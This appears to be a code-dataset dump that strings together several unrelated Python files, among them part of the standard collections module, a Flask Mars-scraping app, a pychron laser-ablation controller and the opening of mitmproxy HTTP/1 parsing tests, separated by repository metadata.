are stored as dictionary values.
>>> c = Counter('abcdeabcdabcaba') # count elements from a string
>>> c.most_common(3) # three most common elements
[('a', 5), ('b', 4), ('c', 3)]
>>> sorted(c) # list all unique elements
['a', 'b', 'c', 'd', 'e']
>>> ''.join(sorted(c.elements())) # list elements with repetitions
'aaaaabbbbcccdde'
>>> sum(c.values()) # total of all counts
15
>>> c['a'] # count of letter 'a'
5
>>> for elem in 'shazam': # update counts from an iterable
... c[elem] += 1 # by adding 1 to each element's count
>>> c['a'] # now there are seven 'a'
7
>>> del c['b'] # remove all 'b'
>>> c['b'] # now there are zero 'b'
0
>>> d = Counter('simsalabim') # make another counter
>>> c.update(d) # add in the second counter
>>> c['a'] # now there are nine 'a'
9
>>> c.clear() # empty the counter
>>> c
Counter()
Note: If a count is set to zero or reduced to zero, it will remain
in the counter until the entry is deleted or the counter is cleared:
>>> c = Counter('aaabbc')
>>> c['b'] -= 2 # reduce the count of 'b' by two
>>> c.most_common() # 'b' is still in, but its count is zero
[('a', 3), ('c', 1), ('b', 0)]
'''
# References:
# http://en.wikipedia.org/wiki/Multiset
# http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
# http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
# http://code.activestate.com/recipes/259174/
# Knuth, TAOCP Vol. II section 4.6.3
def __init__(self, iterable=None, **kwds):
'''Create a new, empty Counter object. And if given, count elements
from an input iterable. Or, initialize the count from another mapping
of elements to their counts.
>>> c = Counter() # a new, empty counter
>>> c = Counter('gallahad') # a new counter from an iterable
>>> c = Counter({'a': 4, 'b': 2}) # a new counter from a mapping
>>> c = Counter(a=4, b=2) # a new counter from keyword args
'''
super().__init__()
self.update(iterable, **kwds)
def __missing__(self, key):
'The count of elements not in the Counter is zero.'
# Needed so that self[missing_item] does not raise KeyError
return 0
def most_common(self, n=None):
'''List the n most common elements and their counts from the most
common to the least. If n is None, then list all element counts.
>>> Counter('abcdeabcdabcaba').most_common(3)
[('a', 5), ('b', 4), ('c', 3)]
'''
# Emulate Bag.sortedByCount from Smalltalk
if n is None:
return sorted(self.items(), key=_itemgetter(1), reverse=True)
return _heapq.nlargest(n, self.items(), key=_itemgetter(1))
def elements(self):
'''Iterator over elements repeating each as many times as its count.
>>> c = Counter('ABCABC')
>>> sorted(c.elements())
['A', 'A', 'B', 'B', 'C', 'C']
# Knuth's example for prime factors of 1836: 2**2 * 3**3 * 17**1
>>> prime_factors = Counter({2: 2, 3: 3, 17: 1})
>>> product = 1
>>> for factor in prime_factors.elements(): # loop over factors
... product *= factor # and multiply them
>>> product
1836
Note, if an element's count has been set to zero or is a negative
number, elements() will ignore it.
'''
# Emulate Bag.do from Smalltalk and Multiset.begin from C++.
return _chain.from_iterable(_starmap(_repeat, self.items()))
# Override dict methods where necessary
@classmethod
def fromkeys(cls, iterable, v=None):
# There is no equivalent method for counters because setting v=1
# means that no element can have a count greater than one.
raise NotImplementedError(
'Counter.fromkeys() is undefined. Use Counter(iterable) instead.')
def update(self, iterable=None, **kwds):
'''Like dict.update() but add counts instead of replacing them.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.update('witch') # add elements from another iterable
>>> d = Counter('watch')
>>> c.update(d) # add elements from another counter
>>> c['h'] # four 'h' in which, witch, and watch
4
'''
# The regular dict.update() operation makes no sense here because the
# replace behavior results in some of the original untouched counts
# being mixed in with all of the other counts for a mishmash that
# doesn't have a straightforward interpretation in most counting
# contexts. Instead, we implement straight addition. Both the inputs
# and outputs are allowed to contain zero and negative counts.
if iterable is not None:
if isinstance(iterable, Mapping):
if self:
self_get = self.get
for elem, count in iterable.items():
self[elem] = count + self_get(elem, 0)
else:
super().update(iterable) # fast path when counter is empty
else:
_count_elements(self, iterable)
if kwds:
self.update(kwds)
def subtract(self, iterable=None, **kwds):
'''Like dict.update() but subtracts counts instead of replacing them.
Counts can be reduced below zero. Both the inputs and outputs are
allowed to contain zero and negative counts.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.subtract('witch') # subtract elements from another iterable
>>> c.subtract(Counter('watch')) # subtract elements from another counter
>>> c['h'] # 2 in which, minus 1 in witch, minus 1 in watch
0
>>> c['w'] # 1 in which, minus 1 in witch, minus 1 in watch
-1
'''
if iterable is not None:
self_get = self.get
if isinstance(iterable, Mapping):
for elem, count in iterable.items():
self[elem] = self_get(elem, 0) - count
else:
for elem in iterable:
self[elem] = self_get(elem, 0) - 1
if kwds:
self.subtract(kwds)
def copy(self):
'Return a shallow copy.'
return self.__class__(self)
def __reduce__(self):
return self.__class__, (dict(self),)
def __delitem__(self, elem):
'Like dict.__delitem__() but does not raise KeyError for missing values.'
if elem in self:
super().__delitem__(elem)
def __repr__(self):
if not self:
return '%s()' % self.__class__.__name__
items = ', '.join(map('%r: %r'.__mod__, self.most_common()))
return '%s({%s})' % (self.__class__.__name__, items)
# Multiset-style mathematical operations discussed in:
# Knuth TAOCP Volume II section 4.6.3 exercise 19
# and at http://en.wikipedia.org/wiki/Multiset
#
# Outputs guaranteed to only include positive counts.
#
# To strip negative and zero counts, add-in an empty counter:
# c += Counter()
def __add__(self, other):
'''Add counts from two counters.
>>> Counter('abbb') + Counter('bcc')
Counter({'b': 4, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count + other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __sub__(self, other):
''' Subtract count, but keep only results with positive counts.
>>> Counter('abbbc') - Counter('bccd')
Counter({'b': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count - other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count < 0:
result[elem] = 0 - count
return result
def __or__(self, other):
'''Union is the maximum of value in either of the input counters.
>>> Counter('abbb') | Counter('bcc')
Counter({'b': 3, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = other_count if count < other_count else count
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __and__(self, other):
''' Intersection is the minimum of corresponding counts.
>>> Counter('abbb') & Counter('bcc')
Counter({'b': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = count if count < other_count else other_count
if newcount > 0:
result[elem] = newcount
return result
########################################################################
### ChainMap (helper for configparser)
########################################################################
class _ChainMap(MutableMapping):
''' A ChainMap groups multiple dicts (or other mappings) together
to create a single, updateable view.
The underlying mappings are stored in a list. That list is public and can be
accessed or updated using the *maps* attribute. There is no other state.
Lookups search the underlying mappings successively until a key is found.
In contrast, writes, updates, and deletions only operate on the first
mapping.
'''
def __init__(self, *maps):
'''Initialize a ChainMap by setting *maps* to the given mappings.
If no mappings are provided, a single empty dictionary is used.
'''
self.maps = list(maps) or [{}] # always at least one map
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key):
for mapping in self.maps:
try:
return mapping[key] # can't use 'key in mapping' with defaultdict
except KeyError:
pass
return self.__missing__(key) # support subclasses that define __missing__
def get(self, key, default=None):
return self[key] if key in self else default
def __len__(self):
return len(set().union(*self.maps)) # reuses stored hash values if possible
def __iter__(self):
return iter(set().union(*self.maps))
def __contains__(self, key):
return any(key in m for m in self.maps)
def __bool__(self):
return any(self.maps)
@_recursive_repr()
def __repr__(self):
return '{0.__class__.__name__}({1})'.format(
self, ', '.join(map(repr, self.maps)))
@classmethod
def fromkeys(cls, iterable, *args):
'Create a ChainMap with a single dict created from the iterable.'
return cls(dict.fromkeys(iterable, *args))
def copy(self):
'New ChainMap or subclass with a new copy of maps[0] and refs to maps[1:]'
return self.__class__(self.maps[0].copy(), *self.maps[1:])
__copy__ = copy
def new_child(self): # like Django's Context.push()
'New ChainMap with a new dict followed by all previous maps.'
return self.__class__({}, *self.maps)
@property
def parents(self): # like Django's Context.pop()
'New ChainMap from maps[1:].'
return self.__class__(*self.maps[1:])
def __setitem__(self, key, value):
self.maps[0][key] = value
def __delitem__(self, key):
try:
del self.maps[0][key]
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def popitem(self):
'Remove and return an item pair from maps[0]. Raise KeyError if maps[0] is empty.'
try:
return self.maps[0].popitem()
except KeyError:
raise KeyError('No keys found in the first mapping.')
def pop(self, key, *args):
'Remove *key* from maps[0] and return its value. Raise KeyError if *key* not in maps[0].'
try:
return self.maps[0].pop(key, *args)
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def clear(self):
'Clear maps[0], leaving maps[1:] intact.'
self.maps[0].clear()
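# A short usage sketch in the doctest style used elsewhere in this module
# (illustrative, not executed): lookups search the maps in order, while writes
# and deletions only touch maps[0].
#   >>> cm = _ChainMap({'x': 1}, {'x': 10, 'y': 20})
#   >>> cm['x'], cm['y']
#   (1, 20)
#   >>> cm['y'] = 99                      # lands in the first mapping
#   >>> cm.maps
#   [{'x': 1, 'y': 99}, {'x': 10, 'y': 20}]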
################################################################################
### UserDict
################################################################################
class UserDict(MutableMapping):
# Start by filling-out the abstract methods
def __init__(self, dict=None, **kwargs):
self.data = {}
if dict is not None:
self.update(dict)
if len(kwargs):
self.update(kwargs)
def __len__(self): return len(self.data)
def __getitem__(self, key):
if key in self.data:
return self.data[key]
if hasattr(self.__class__, "__missing__"):
return self.__class__.__missing__(self, key)
raise KeyError(key)
def __setitem__(self, key, item): self.data[key] = item
def __delitem__(self, key): del self.data[key]
def __iter__(self):
return iter(self.data)
# Modify __contains__ to work correctly when __missing__ is present
def __contains__(self, key):
return key in self.data
# Now, add the methods in dicts but not in MutableMapping
def __repr__(self): return repr(self.data)
def copy(self):
if self.__class__ is UserDict:
return UserDict(self.data.copy())
import copy
data = self.data
try:
self.data = {}
c = copy.copy(self)
finally:
self.data = data
c.update(self)
return c
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
################################################################################
### UserList
################################################################################
class UserList(MutableSequence):
"""A more or less complete user-defined wrapper around list objects."""
def __init__(self, initlist=None):
self.data = []
if initlist is not None:
# XXX should this accept an arbitrary sequence?
if type(initlist) == type(self.data):
self.data[:] = initlist
elif isinstance(initlist, UserList):
self.data[:] = initlist.data[:]
else:
self.data = list(initlist)
def __repr__(self): return repr(self.data)
def __lt__(self, other): return self.data < self.__cast(other)
def __le__(self, other): return self.data <= self.__cast(other)
def __eq__(self, other): return self.data == self.__cast(other)
def __ne__(self, other): return self.data != self.__cast(other)
def __gt__(self, other): return self.data > self.__cast(other)
def __ge__(self, other): return self.data >= self.__cast(other)
def __cast(self, other):
return other.data if isinstance(other, UserList) else other
def __contains__(self, item): return item in self.data
def __len__(self): return len(self.data)
def __getitem__(self, i): return self.data[i]
def __setitem__(self, i, item): self.data[i] = item
def __delitem__(self, i): del self.data[i]
def __add__(self, other):
if isinstance(other, UserList):
return self.__class__(self.data + other.data)
elif isinstance(other, type(self.data)):
return self.__class__(self.data + other)
return self.__class__(self.data + list(other))
def __radd__(self, other):
if isinstance(other, UserList):
return self.__class__(other.data + self.data)
elif isinstance(other, type(self.data)):
return self.__class__(other + self.data)
return self.__class__(list(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserList):
self.data += other.data
elif isinstance(other, type(self.data)):
self.data += other
else:
self.data += list(other)
return self
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
def append(self, item): self.data.append(item)
def insert(self, i, item): self.data.insert(i, item)
def pop(self, i=-1): return self.data.pop(i)
def remove(self, item): self.data.remove(item)
def count(self, item): return self.data.count(item)
def index(self, item, *args): return self.data.index(item, *args)
def reverse(self): self.data.reverse()
def sort(self, *args, **kwds): self.data.sort(*args, **kwds)
def extend(self, other):
if isinstance(other, UserList):
self.data.extend(other.data)
else:
self.data.extend(other)
################################################################################
### UserString
################################################################################
class UserString(Sequence):
def __init__(self, seq):
if isinstance(seq, str):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq)
def __str__(self): return str(self.data)
def __repr__(self): return repr(self.data)
def __int__(self): return int(self.data)
def __float__(self): return float(self.data)
def __complex__(self): return complex(self.data)
def __hash__(self): return hash(self.data)
def __eq__(self, string):
if isinstance(string, UserString):
return self.data == string.data
return self.data == string
def __ne__(self, string):
if isinstance(string, UserString):
return self.data != string.data
return self.data != string
def __lt__(self, string):
if isinstance(string, UserString):
return self.data < string.data
return self.data < string
def __le__(self, string):
if isinstance(string, UserString):
return self.data <= string.data
return self.data <= string
def __gt__(self, string):
if isinstance(string, UserString):
return self.data > string.data
return self.data > string
def __ge__(self, string):
if isinstance(string, UserString):
return self.data >= string.data
return self.data >= string
def __contains__(self, char):
if isinstance(char, UserString):
char = char.data
return char in self.data
def __len__(self): return len(self.data)
def __getitem__(self, index): return self.__class__(self.data[index])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, str):
return self.__class__(self.data + other)
return self.__class__(self.data + str(other))
def __radd__(self, other):
if isinstance(other, str):
return self.__class__(other + self.data)
return self.__class__(str(other) + self.data)
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __mod__(self, args):
return self.__class__(self.data % args)
# the following methods are defined in alphabetical order:
def capitalize(self): return self.__class__(self.data.capitalize())
def center(self, width, *args):
return self.__class__(self.data.center(width, *args))
def count(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.count(sub, start, end)
def encode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.encode(encoding, errors))
return self.__class__(self.data.encode(encoding))
return self.__class__(self.data.encode())
def endswith(self, suffix, start=0, end=_sys.maxsize):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.find(sub, start, end)
def format(self, *args, **kwds):
return self.data.format(*args, **kwds)
def index(self, sub, start=0, end=_sys.maxsize):
return self.data.index(sub, start, end)
def isalpha(self): return self.data.isalpha()
def isalnum(self): return self.data.isalnum()
def isdecimal(self): return self.data.isdecimal()
def isdigit(self): return self.data.isdigit()
def isidentifier(self): return self.data.isidentifier()
def islower(self): return self.data.islower()
def isnumeric(self): return self.data.isnumeric()
def isspace(self): return self.data.isspace()
def istitle(self): return self.data.istitle()
def isupper(self): return self.data.isupper()
def join(self, seq): return self.data.join(seq)
def ljust(self, width, *args):
return self.__class__(self.data.ljust(width, *args))
def lower(self): return self.__class__(self.data.lower())
def lstrip(self, chars=None): return self.__class__(self.data.lstrip(chars))
def partition(self, sep):
return self.data.partition(sep)
def replace(self, old, new, maxsplit=-1):
if isinstance(old, UserString):
old = old.data
if isinstance(new, UserString):
new = new.data
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.rfind(sub, start, end)
def rindex(self, sub, start=0, end=_sys.maxsize):
return self.data.rindex(sub, start, end)
def rjust(self, width, *args):
return self.__class__(self.data.rjust(width, *args))
def rpartition(self, sep):
return self.data.rpartition(sep)
def rstrip(self, chars=None):
return self.__class__(self.data.rstrip(chars))
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def rsplit(self, sep=None, maxsplit=-1):
return self.data.rsplit(sep, maxsplit)
def splitlines(self, keepends=0): return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=_sys.maxsize):
return self.data.startswith(prefix, start, end)
def strip(self, chars=None): return self.__class__(self.data.strip(chars))
def swapcase(self): return self.__class__(self.data.swapcase())
def title(self): return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self): return self.__class__(self.data.upper())
def zfill(self, width): return self.__class__(self.data.zfill(width))
################################################################################
### Simple tests
################################################################################
if __name__ == '__main__':
# verify that instances can be pickled
from pickle import loads, dumps
Point = namedtuple('Point', 'x, y', True)
p = Point(x=10, y=20)
assert p == loads(dumps(p))
# test and demonstrate ability to override methods
class Point(namedtuple('Point', 'x y')):
__slots__ = ()
@property
def hypot(self):
return (self.x ** 2 + self.y ** 2) ** 0.5
def __str__(self):
return 'Point: x=%6.3f y=%6.3f hypot=%6.3f' % (self.x, self.y, self.hypot)
for p in Point(3, 4), Point(14, 5/7.):
print (p)
class Point(namedtuple('Point', 'x y')):
'Point class with optimized _make() and _replace() without error-checking'
__slots__ = ()
_make = classmethod(tuple.__new__)
def _replace(self, _map=map, **kwds):
return self._make(_map(kwds.get, ('x', 'y'), self))
print(Point(11, 22)._replace(x=100))
Point3D = namedtuple('Point3D', Point._fields + ('z',))
print(Point3D.__doc__)
import doctest
TestResults = namedtuple('TestResults', 'failed attempted')
print(TestResults(*doctest.testmod()))
| 37.657749
| 126
| 0.57686
|
69c02a2ceea34fb3af0df57496542fe495ec0aea
| 103
|
py
|
Python
|
FootageOverview/FootageManager/apps.py
|
nylser/FootageOverview
|
921e003550ba445d5a3308dee231a2d92e642b01
|
[
"Unlicense"
] | null | null | null |
FootageOverview/FootageManager/apps.py
|
nylser/FootageOverview
|
921e003550ba445d5a3308dee231a2d92e642b01
|
[
"Unlicense"
] | null | null | null |
FootageOverview/FootageManager/apps.py
|
nylser/FootageOverview
|
921e003550ba445d5a3308dee231a2d92e642b01
|
[
"Unlicense"
] | null | null | null |
from django.apps import AppConfig
class FootagemanagerConfig(AppConfig):
name = 'FootageManager'
| 17.166667
| 38
| 0.786408
|
f3ce0e8f16f3e546ab85fe7dd2e233278f72333b
| 1,062
|
py
|
Python
|
Missions_to_Mars/app.py
|
alienor1/web-scraping-challenge
|
ddef4f42f74d72793796ca96d532e4f8c49f4525
|
[
"ADSL"
] | null | null | null |
Missions_to_Mars/app.py
|
alienor1/web-scraping-challenge
|
ddef4f42f74d72793796ca96d532e4f8c49f4525
|
[
"ADSL"
] | null | null | null |
Missions_to_Mars/app.py
|
alienor1/web-scraping-challenge
|
ddef4f42f74d72793796ca96d532e4f8c49f4525
|
[
"ADSL"
] | null | null | null |
from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import scrape_mars
app = Flask(__name__)
mongo = PyMongo(app, uri="mongodb://localhost:27017/mars_application")
@app.route("/")
def home():
# Find one record of data from the mongo database
mars_data = mongo.db.collection.find_one()
# make the auto-generated table a Bootstrap-styled table
mars_data["Mars_Table"]=mars_data["Mars_Table"].replace('<table border="1" class="dataframe">',"<table class='table table-sm'>")
print("--- MONGO DATA ---")
print(mars_data)
print("--- END MONGO DATA ---")
# Return template and data
return render_template("index.html", mission_mars=mars_data)
# Route that will trigger the scrape function
@app.route("/scrape")
def scrape():
# Run the scrape function in Python File
mars_data = scrape_mars.scrape()
mongo.db.collection.update({}, mars_data, upsert=True)
# Redirect back to index/home page
return redirect("/", 302)
if __name__ == "__main__":
app.run(debug=True)
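# Usage sketch (host/port are Flask defaults; MongoDB must be running on localhost:27017):
#   $ python app.py
#   # visit http://127.0.0.1:5000/scrape once to populate the collection,
#   # then http://127.0.0.1:5000/ to render the scraped data.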
| 27.230769
| 132
| 0.694915
|
5f343bb1889f1dc7e0c5bf1349650ef913c53e47
| 9,524
|
py
|
Python
|
pychron/lasers/laser_managers/ablation_laser_manager.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | null | null | null |
pychron/lasers/laser_managers/ablation_laser_manager.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | 27
|
2019-10-07T17:43:35.000Z
|
2021-12-05T21:25:07.000Z
|
pychron/lasers/laser_managers/ablation_laser_manager.py
|
ael-noblegas/pychron
|
6ebbbb1f66a614972b62b7a9be4c784ae61b5d62
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
# Copyright 2015 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# ============= standard library imports ========================
import time
# ============= local library imports ==========================
from pychron.core.helpers.strtools import csv_to_floats
from pychron.lasers.laser_managers.serial_laser_manager import SerialLaserManager
class ReadPositionError(BaseException):
def __init__(self, xyz):
self._msg = 'ReadPosition error. Laser responded={}'.format(xyz)
def __str__(self):
return self._msg
def __repr__(self):
return self._msg
class AblationCO2Manager(SerialLaserManager):
stage_manager_id = 'ablation.pychron'
configuration_dir_name = 'ablation'
read_delay = 25
def set_tray(self, t):
if self.stage_manager:
self.stage_manager.stage_map_name = t
def _test_connection_hook(self):
i = 0
n = 3
while 1:
re = self._ask('GetVersion')
if re:
self.connected = True
return
elif i > n:
self.connected = False
return
time.sleep(1)
i += 1
def end_extract(self, *args, **kw):
self.info('ending extraction. set laser power to 0')
self.set_laser_power(0)
if self._patterning:
self.stop_pattern()
self.disable_laser()
def fire_laser(self):
self.info('fire laser')
self._ask('SetLaserOn 1')
def extract(self, value, units=None, tol=0.1, fire_laser=True, **kw):
if units is None:
units = 'watts'
self.info('set laser output to {} {}'.format(value, units))
if units == 'watts':
ovalue = value
value = self.calculate_calibrated_power(value)
if value < 0:
self.warning('Consider changing your calibration curve. '
'{} watts converted to {}%. % must be positive'.format(ovalue, value))
value = 0
resp = self.set_laser_power(value)
if fire_laser:
time.sleep(1)
self.fire_laser()
try:
return abs(float(resp) - value) < tol
except BaseException:
pass
def set_laser_power(self, v):
self.debug('setting laser output to {}'.format(v))
return self._ask('SetLaserOutput {}'.format(v))
def enable_laser(self, **kw):
# self._ask('laser.enable ON')
self.info('enabling laser')
self._ask('SetLaserFireMode 3') # 3= continuous wave
# self._ask('SetLaserOn 1')
self.enabled = True
def disable_laser(self):
self.info('disabling laser')
self.set_laser_power(0)
self._ask('SetLaserOn 0')
self.enabled = False
def get_position(self, retry=True):
x, y, z = self._x, self._y, self._z
xyz = self._ask('ReadPosition')
if xyz:
try:
x, y, z = [float(v) for v in xyz.split(',')]
if self.stage_manager.use_sign_position_correction:
x = x * self.stage_manager.x_sign
y = y * self.stage_manager.y_sign
z = z * self.stage_manager.z_sign
except ValueError:
self.warning('failed parsing position: {}'.format(xyz))
if retry:
time.sleep(0.5)
x, y, z = self.get_position(retry=False)
else:
raise ReadPositionError(xyz)
return x, y, z
def _ask(self, cmd, retry=3):
resp = super(AblationCO2Manager, self)._ask(cmd)
if not resp or (resp and resp.strip().startswith('ERROR')):
if retry:
resp = self._ask(cmd, retry-1)
return resp
def linear_move(self, x, y, block=False, *args, **kw):
self._move_to_position((x, y), block=block)
def stop(self):
self.warning_dialog('The Laser Ablation software does not allow remote stopping of the laser motion')
# self._ask('stage.stop')
# self._is_moving = False
# self.update_position()
# private
def _stage_stop_button_fired(self):
self.stop()
def _fire_laser_button_fired(self):
# if self._firing:
# cmd = 0
# else:
# cmd = 1
self._firing = not self._firing
self._ask('SetLaserOn {}'.format(int(self._firing)))
def _output_power_changed(self, new):
self.extract(new, self.units, fire_laser=False)
def _set_x(self, v):
if self._move_enabled and v != self._x:
self._is_moving = True
self._ask('SetPosition {:0.3f},{:0.3f},{:0.3f}'.format(v, self._y, self._z))
self._single_axis_moving(v, 0)
def _set_y(self, v):
if self._move_enabled and v != self._y:
self._is_moving = True
self._ask('SetPosition {:0.3f},{:0.3f},{:0.3f}'.format(self._x, v, self._z))
self._single_axis_moving(v, 1)
def _set_z(self, v):
if self._move_enabled and v != self._z:
self._is_moving = True
self._ask('SetPosition {:0.3f},{:0.3f},{:0.3f}'.format(self._x, self._y, v))
self._single_axis_moving(v, 2)
def _single_axis_moving(self, v, axis):
def cmpfunc(xyz):
try:
if not self._is_moving:
return True
# pos =[float(p) for p in xyz.split(','))[axis]
pos = float(xyz.split(',')[axis])
return abs(pos - v) > 2
# print map(lambda ab: abs(ab[0] - ab[1]) <= 2,
# zip(map(float, xyz.split(',')),
# (xm, ym, zm)))
# return not all(map(lambda ab: abs(ab[0] - ab[1]) <= 2,
# zip(map(float, xyz.split(',')),
# (xm, ym, zm))))
except ValueError as e:
print('_moving exception {}'.format(e))
self._block(cmd='ReadPosition', cmpfunc=cmpfunc)
time.sleep(0.25)
self._is_moving = False
self.update_position()
def _move_to_position(self, pos, autocenter=False, block=True, *args, **kw):
sm = self.stage_manager
try:
x, y = self._get_hole_xy(pos)
except ValueError:
return
z = self._z
# xs = 5000
# ys = 5000
# zs = 100
self._is_moving = True
self.debug('pos={}, x={}, y={}'.format(pos, x, y))
if sm.use_sign_position_correction:
x *= sm.x_sign
y *= sm.y_sign
z *= sm.z_sign
cmd = 'SetPosition {:0.3f},{:0.3f},{:0.3f}'.format(x, y, z)
self.info('sending {}'.format(cmd))
self._ask(cmd)
time.sleep(1)
return self._moving(x, y, z, block)
def _moving(self, xm, ym, zm, block=True):
r = True
if block:
time.sleep(0.5)
def cmpfunc(xyz):
try:
if not self._is_moving:
return True
# ps = [float(p) for p in xyz.split(',')]
ps = csv_to_floats(xyz)
# return not all([abs(ab[0] - ab[1]) <= 2 for ab in zip(list(map(float, xyz.split(','))),
# (xm, ym, zm))])
return not all(abs(a - b) <= 0.01 for a, b in zip(ps, (xm, ym, zm)))
except ValueError as e:
print('_moving exception {}'.format(e))
r = self._block(cmd='ReadPosition', cmpfunc=cmpfunc, period=1)
self._is_moving = False
time.sleep(0.5)
self.update_position()
return r
def _stage_manager_default(self):
name = 'ablation'
args = dict(name='stage',
configuration_name='stage',
configuration_dir_name=name,
parent=self)
return self._stage_manager_factory(args)
def _stage_manager_factory(self, args):
from pychron.lasers.stage_managers.ablation_stage_manager import AblationStageManager
self.stage_args = args
klass = AblationStageManager
sm = klass(**args)
sm.id = self.stage_manager_id
return sm
def _pattern_executor_default(self):
from pychron.lasers.pattern.pattern_executor import PatternExecutor
pm = PatternExecutor(application=self.application,
controller=self,
laser_manager=self)
return pm
# ============= EOF =============================================
| 32.728522
| 109
| 0.526564
|
9746c1e1dd3382fc89bad8d20d4fce321defbf2c
| 11,941
|
py
|
Python
|
test/mitmproxy/net/http/http1/test_read.py
|
cifred98/mitmproxy
|
59fd15ef12c7eba4f44c5ad91171ccc8eb12e50b
|
[
"MIT"
] | 3
|
2021-12-25T02:29:24.000Z
|
2022-02-22T02:12:30.000Z
|
test/mitmproxy/net/http/http1/test_read.py
|
cifred98/mitmproxy
|
59fd15ef12c7eba4f44c5ad91171ccc8eb12e50b
|
[
"MIT"
] | null | null | null |
test/mitmproxy/net/http/http1/test_read.py
|
cifred98/mitmproxy
|
59fd15ef12c7eba4f44c5ad91171ccc8eb12e50b
|
[
"MIT"
] | 1
|
2022-02-01T07:12:57.000Z
|
2022-02-01T07:12:57.000Z
|
from io import BytesIO
from unittest.mock import Mock
import pytest
from mitmproxy import exceptions
from mitmproxy.net.http import Headers
from mitmproxy.net.http.http1.read import (
read_request, read_response, read_request_head,
read_response_head, read_body, connection_close, expected_http_body_size, _get_first_line,
_read_request_line, _read_response_line, _check_http_version,
_read_headers, _read_chunked, get_header_tokens
)
from mitmproxy.test.tutils import treq, tresp
def test_get_header_tokens():
headers = Headers()
assert get_header_tokens(headers, "foo") == []
headers["foo"] = "bar"
assert get_header_tokens(headers, "foo") == ["bar"]
headers["foo"] = "bar, voing"
assert get_header_tokens(headers, "foo") == ["bar", "voing"]
headers.set_all("foo", ["bar, voing", "oink"])
assert get_header_tokens(headers, "foo") == ["bar", "voing", "oink"]
@pytest.mark.parametrize("input", [
b"GET / HTTP/1.1\r\n\r\nskip",
b"GET / HTTP/1.1\r\n\r\nskip",
b"GET / HTTP/1.1\r\n\r\nskip",
b"GET / HTTP/1.1 \r\n\r\nskip",
])
def test_read_request(input):
rfile = BytesIO(input)
r = read_request(rfile)
assert r.method == "GET"
assert r.content == b""
assert r.http_version == "HTTP/1.1"
assert r.timestamp_end
assert rfile.read() == b"skip"
@pytest.mark.parametrize("input", [
b"CONNECT :0 0",
])
def test_read_request_error(input):
rfile = BytesIO(input)
with pytest.raises(exceptions.HttpException):
read_request(rfile)
def test_read_request_head():
rfile = BytesIO(
b"GET / HTTP/1.1\r\n"
b"Content-Length: 4\r\n"
b"\r\n"
b"skip"
)
rfile.reset_timestamps = Mock()
rfile.first_byte_timestamp = 42
r = read_request_head(rfile)
assert r.method == "GET"
assert r.headers["Content-Length"] == "4"
assert r.content is None
assert rfile.reset_timestamps.called
assert r.timestamp_start == 42
assert rfile.read() == b"skip"
@pytest.mark.parametrize("input", [
b"HTTP/1.1 418 I'm a teapot\r\n\r\nbody",
b"HTTP/1.1 418 I'm a teapot\r\n\r\nbody",
b"HTTP/1.1 418 I'm a teapot\r\n\r\nbody",
b"HTTP/1.1 418 I'm a teapot \r\n\r\nbody",
])
def test_read_response(input):
req = treq()
rfile = BytesIO(input)
r = read_response(rfile, req)
assert r.http_version == "HTTP/1.1"
assert r.status_code == 418
assert r.reason == "I'm a teapot"
assert r.content == b"body"
assert r.timestamp_end
def test_read_response_head():
rfile = BytesIO(
b"HTTP/1.1 418 I'm a teapot\r\n"
b"Content-Length: 4\r\n"
b"\r\n"
b"skip"
)
rfile.reset_timestamps = Mock()
